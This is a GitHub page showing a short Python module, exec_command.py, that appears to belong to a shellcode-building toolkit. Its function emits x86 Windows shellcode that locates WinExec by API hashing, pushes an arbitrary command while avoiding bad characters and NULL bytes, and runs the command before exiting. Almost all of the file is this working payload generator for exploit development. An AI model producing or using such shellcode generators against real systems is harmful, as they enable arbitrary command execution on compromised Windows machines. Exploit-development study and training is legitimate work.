-
Notifications
You must be signed in to change notification settings - Fork 12
Expand file tree
/
Copy pathexec_command.py
More file actions
31 lines (24 loc) · 1.02 KB
/
exec_command.py
File metadata and controls
31 lines (24 loc) · 1.02 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from coder import call_exit_func, find_and_call
from coder.util import find_hash_key, push_hash, push_string
def generate(cmd, bad_chars, exit_func, debug=False):
hash_key = find_hash_key(
[("KERNEL32.DLL", "WinExec")] + ([exit_func] if exit_func else []),
bad_chars,
)
return f"""
start:
{'int3' if debug else ''} // Breakpoint for Windbg
mov ebp, esp
add esp, 0xfffff9f0 // Avoid NULL bytes
{find_and_call.generate(hash_key)}
create_cmd_string:
{push_string(cmd, bad_chars)}
mov ecx, esp
call_winexec: // UINT WinExec([in] LPCSTR lpCmdLine, [in] UINT uCmdShow);
xor edx, edx // edx = 0
push edx // uCmdShow = NULL
push ecx // lpCmdLine = &(cmd)
{push_hash('KERNEL32.DLL', 'WinExec', hash_key)}
call dword ptr [ebp+0x04] // Call WinExec
{call_exit_func.generate(exit_func, hash_key)}
"""